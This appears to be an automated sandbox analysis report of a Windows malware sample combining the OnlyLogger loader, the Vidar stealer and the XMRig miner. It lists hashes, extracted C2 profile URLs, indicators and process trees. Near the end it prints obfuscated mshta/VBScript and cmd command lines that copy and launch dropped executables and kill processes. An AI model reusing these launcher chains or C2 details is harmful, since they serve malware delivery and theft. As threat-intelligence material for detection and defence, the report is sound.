onlylogger | 646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49

Analysis

max time kernel
157s
max time network
170s
platform
windows10-2004_x64
resource
win10v2004-en-20220113
submitted
19-03-2022 11:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe
Size

8KB
MD5

fe83ef41d82529b45dcf0cef116a2df0
SHA1

8d1daee38437ba003d9913af9bc3abd4afd3e996
SHA256

646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49
SHA512

0688940be45ff49e45d582b4976a9dbe0f1c706275ce554fe90020725dddf93b240263d50d81b78e225471fe43a3b2589b81f3208c1991604f15e9875c9fafd1

Score

10^/10

onlylogger vidar xmrig 933 loader miner stealer

Malware Config

Extracted

Family

vidar

Version

48.7

Botnet

933

https://mstdn.social/@anapa

https://mastodon.social/@mniami

Attributes

profile_id
933

Signatures

OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4292 3812 rundll32.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	3812	rundll32.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1672-212-0x00000000033A0000-0x00000000033E3000-memory.dmp	family_onlylogger
behavioral2/memory/1672-218-0x0000000000400000-0x0000000003241000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/1512-193-0x0000000004F60000-0x0000000005035000-memory.dmp	family_vidar
behavioral2/memory/1512-197-0x0000000000400000-0x0000000003296000-memory.dmp	family_vidar

XMRig Miner Payload 3 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/2148-238-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2148-239-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral2/memory/2148-240-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Downloads MZ/PE file

Executes dropped EXE 19 IoCs

Processes:

LzmwAqmV.exechrome1.exeSoftwareInstaller2191.exeWorldoffer.exeinst1.exechrome2.exesearch_hyperfs_206.exesetup.exeyangjuan-game.exeCalculator Installation.exechrome3.exechrome4.exechrome5.exeChrome5a.exekPBhgOaGQk.exeLzmwAqmV.exesetup.exeservices64.exesihost64.exe

pid	process
2668	LzmwAqmV.exe
4680	chrome1.exe
2380	SoftwareInstaller2191.exe
1512	Worldoffer.exe
2692	inst1.exe
4584	chrome2.exe
2624	search_hyperfs_206.exe
1672	setup.exe
2996	yangjuan-game.exe
1288	Calculator Installation.exe
4764	chrome3.exe
2928	chrome4.exe
2156	chrome5.exe
4476	Chrome5a.exe
1260	kPBhgOaGQk.exe
2028	LzmwAqmV.exe
3104	setup.exe
5100	services64.exe
4476	sihost64.exe

Checks computer location settings 2 TTPs 11 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome3.exekPBhgOaGQk.exemshta.exemshta.exe646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exeLzmwAqmV.exesearch_hyperfs_206.exemshta.exechrome4.exechrome5.exechrome2.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	chrome3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	kPBhgOaGQk.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	LzmwAqmV.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	search_hyperfs_206.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	chrome4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	chrome5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation	chrome2.exe

Loads dropped DLL 40 IoCs

Processes:

Calculator Installation.exeLzmwAqmV.exerundll32.exesetup.exe

pid	process
1288	Calculator Installation.exe
1288	Calculator Installation.exe
1288	Calculator Installation.exe
1288	Calculator Installation.exe
1288	Calculator Installation.exe
1288	Calculator Installation.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
1288	Calculator Installation.exe
4848	rundll32.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
2028	LzmwAqmV.exe
3104	setup.exe
3104	setup.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

conhost.exe

description pid process target process

PID 3536 set thread context of 2148 3536 conhost.exe explorer.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	pid	process	target process
PID 3536 set thread context of 2148	3536	conhost.exe	explorer.exe

Program crash 17 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2964	4680	WerFault.exe	chrome1.exe
3312	2928	WerFault.exe	chrome4.exe
1332	2156	WerFault.exe	chrome5.exe
1448	4764	WerFault.exe	chrome3.exe
3736	4848	WerFault.exe	rundll32.exe
4072	1672	WerFault.exe	setup.exe
2228	1672	WerFault.exe	setup.exe
4804	1672	WerFault.exe	setup.exe
1348	1672	WerFault.exe	setup.exe
2292	1672	WerFault.exe	setup.exe
3676	1672	WerFault.exe	setup.exe
1684	1672	WerFault.exe	setup.exe
3832	2148	WerFault.exe	explorer.exe
1892	2148	WerFault.exe	explorer.exe
3392	1672	WerFault.exe	setup.exe
1272	1672	WerFault.exe	setup.exe
1312	4700	WerFault.exe	SearchApp.exe

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

2684 schtasks.exe

pid	process
2684	schtasks.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

SearchApp.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	SearchApp.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	SearchApp.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2600 taskkill.exe

pid	process
2600	taskkill.exe

Modifies registry class 30 IoCs

Processes:

SearchApp.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2257"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "5791"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "173"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\MuiCache	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "173"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "5791"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2686"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2686"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4ei = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "140"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2686"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "5791"	SearchApp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com	SearchApp.exe
Key created	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "173"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "2257"	SearchApp.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2257"	SearchApp.exe

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 36 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

LzmwAqmV.execonhost.execonhost.exe

pid process

2028 LzmwAqmV.exe
3712 conhost.exe
3536 conhost.exe
3536 conhost.exe
3536 conhost.exe

description	flow	ioc
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
2028	LzmwAqmV.exe
3712	conhost.exe
3536	conhost.exe
3536	conhost.exe
3536	conhost.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

Processes:

646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exechrome1.exechrome2.exeSoftwareInstaller2191.exechrome3.exechrome4.exechrome5.exetaskkill.exeLzmwAqmV.execonhost.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1792	646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe
Token: SeDebugPrivilege	4680	chrome1.exe
Token: SeDebugPrivilege	4584	chrome2.exe
Token: SeDebugPrivilege	2380	SoftwareInstaller2191.exe
Token: SeDebugPrivilege	4764	chrome3.exe
Token: SeDebugPrivilege	2928	chrome4.exe
Token: SeDebugPrivilege	2156	chrome5.exe
Token: SeDebugPrivilege	2600	taskkill.exe
Token: SeDebugPrivilege	2028	LzmwAqmV.exe
Token: SeDebugPrivilege	3712	conhost.exe
Token: SeDebugPrivilege	3536	conhost.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

SearchApp.exe

pid process

4700 SearchApp.exe

pid	process
4700	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exeLzmwAqmV.exesearch_hyperfs_206.exemshta.execmd.exekPBhgOaGQk.exemshta.exechrome2.exerundll32.exeChrome5a.execonhost.execmd.exe

description	pid	process	target process
PID 1792 wrote to memory of 2668	1792	646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe	LzmwAqmV.exe
PID 1792 wrote to memory of 2668	1792	646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe	LzmwAqmV.exe
PID 1792 wrote to memory of 2668	1792	646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe	LzmwAqmV.exe
PID 2668 wrote to memory of 4680	2668	LzmwAqmV.exe	chrome1.exe
PID 2668 wrote to memory of 4680	2668	LzmwAqmV.exe	chrome1.exe
PID 2668 wrote to memory of 2380	2668	LzmwAqmV.exe	SoftwareInstaller2191.exe
PID 2668 wrote to memory of 2380	2668	LzmwAqmV.exe	SoftwareInstaller2191.exe
PID 2668 wrote to memory of 1512	2668	LzmwAqmV.exe	Worldoffer.exe
PID 2668 wrote to memory of 1512	2668	LzmwAqmV.exe	Worldoffer.exe
PID 2668 wrote to memory of 1512	2668	LzmwAqmV.exe	Worldoffer.exe
PID 2668 wrote to memory of 2692	2668	LzmwAqmV.exe	inst1.exe
PID 2668 wrote to memory of 2692	2668	LzmwAqmV.exe	inst1.exe
PID 2668 wrote to memory of 2692	2668	LzmwAqmV.exe	inst1.exe
PID 2668 wrote to memory of 4584	2668	LzmwAqmV.exe	chrome2.exe
PID 2668 wrote to memory of 4584	2668	LzmwAqmV.exe	chrome2.exe
PID 2668 wrote to memory of 2624	2668	LzmwAqmV.exe	search_hyperfs_206.exe
PID 2668 wrote to memory of 2624	2668	LzmwAqmV.exe	search_hyperfs_206.exe
PID 2668 wrote to memory of 2624	2668	LzmwAqmV.exe	search_hyperfs_206.exe
PID 2668 wrote to memory of 1672	2668	LzmwAqmV.exe	setup.exe
PID 2668 wrote to memory of 1672	2668	LzmwAqmV.exe	setup.exe
PID 2668 wrote to memory of 1672	2668	LzmwAqmV.exe	setup.exe
PID 2668 wrote to memory of 2996	2668	LzmwAqmV.exe	yangjuan-game.exe
PID 2668 wrote to memory of 2996	2668	LzmwAqmV.exe	yangjuan-game.exe
PID 2668 wrote to memory of 2996	2668	LzmwAqmV.exe	yangjuan-game.exe
PID 2668 wrote to memory of 1288	2668	LzmwAqmV.exe	Calculator Installation.exe
PID 2668 wrote to memory of 1288	2668	LzmwAqmV.exe	Calculator Installation.exe
PID 2668 wrote to memory of 1288	2668	LzmwAqmV.exe	Calculator Installation.exe
PID 2624 wrote to memory of 1348	2624	search_hyperfs_206.exe	mshta.exe
PID 2624 wrote to memory of 1348	2624	search_hyperfs_206.exe	mshta.exe
PID 2624 wrote to memory of 1348	2624	search_hyperfs_206.exe	mshta.exe
PID 2668 wrote to memory of 4764	2668	LzmwAqmV.exe	chrome3.exe
PID 2668 wrote to memory of 4764	2668	LzmwAqmV.exe	chrome3.exe
PID 2668 wrote to memory of 2928	2668	LzmwAqmV.exe	chrome4.exe
PID 2668 wrote to memory of 2928	2668	LzmwAqmV.exe	chrome4.exe
PID 2668 wrote to memory of 2156	2668	LzmwAqmV.exe	chrome5.exe
PID 2668 wrote to memory of 2156	2668	LzmwAqmV.exe	chrome5.exe
PID 2668 wrote to memory of 4476	2668	LzmwAqmV.exe	Chrome5a.exe
PID 2668 wrote to memory of 4476	2668	LzmwAqmV.exe	Chrome5a.exe
PID 1348 wrote to memory of 4452	1348	mshta.exe	cmd.exe
PID 1348 wrote to memory of 4452	1348	mshta.exe	cmd.exe
PID 1348 wrote to memory of 4452	1348	mshta.exe	cmd.exe
PID 4452 wrote to memory of 1260	4452	cmd.exe	kPBhgOaGQk.exe
PID 4452 wrote to memory of 1260	4452	cmd.exe	kPBhgOaGQk.exe
PID 4452 wrote to memory of 1260	4452	cmd.exe	kPBhgOaGQk.exe
PID 1260 wrote to memory of 2208	1260	kPBhgOaGQk.exe	mshta.exe
PID 1260 wrote to memory of 2208	1260	kPBhgOaGQk.exe	mshta.exe
PID 1260 wrote to memory of 2208	1260	kPBhgOaGQk.exe	mshta.exe
PID 4452 wrote to memory of 2600	4452	cmd.exe	taskkill.exe
PID 4452 wrote to memory of 2600	4452	cmd.exe	taskkill.exe
PID 4452 wrote to memory of 2600	4452	cmd.exe	taskkill.exe
PID 2208 wrote to memory of 2712	2208	mshta.exe	cmd.exe
PID 2208 wrote to memory of 2712	2208	mshta.exe	cmd.exe
PID 2208 wrote to memory of 2712	2208	mshta.exe	cmd.exe
PID 4584 wrote to memory of 2028	4584	chrome2.exe	LzmwAqmV.exe
PID 4584 wrote to memory of 2028	4584	chrome2.exe	LzmwAqmV.exe
PID 4292 wrote to memory of 4848	4292	rundll32.exe	rundll32.exe
PID 4292 wrote to memory of 4848	4292	rundll32.exe	rundll32.exe
PID 4292 wrote to memory of 4848	4292	rundll32.exe	rundll32.exe
PID 4476 wrote to memory of 3712	4476	Chrome5a.exe	conhost.exe
PID 4476 wrote to memory of 3712	4476	Chrome5a.exe	conhost.exe
PID 4476 wrote to memory of 3712	4476	Chrome5a.exe	conhost.exe
PID 3712 wrote to memory of 3528	3712	conhost.exe	cmd.exe
PID 3712 wrote to memory of 3528	3712	conhost.exe	cmd.exe
PID 3528 wrote to memory of 2684	3528	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe
"C:\Users\Admin\AppData\Local\Temp\646eea2b4e17022c1cb7911b0cef68e058cc21835c3be4da29242ddf98182b49.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1792

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2668

C:\Users\Admin\AppData\Local\Temp\chrome1.exe
"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4680

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4680 -s 1668
4⤵
- Program crash
PID:2964

C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
"C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2380

C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
"C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
3⤵
- Executes dropped EXE
PID:1512

C:\Users\Admin\AppData\Local\Temp\inst1.exe
"C:\Users\Admin\AppData\Local\Temp\inst1.exe"
3⤵
- Executes dropped EXE
PID:2692

C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4584

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2624

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
4⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1348

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
5⤵
- Suspicious use of WriteProcessMemory
PID:4452

C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1260

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
7⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2208

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
8⤵
PID:2712

C:\Windows\SysWOW64\mshta.exe
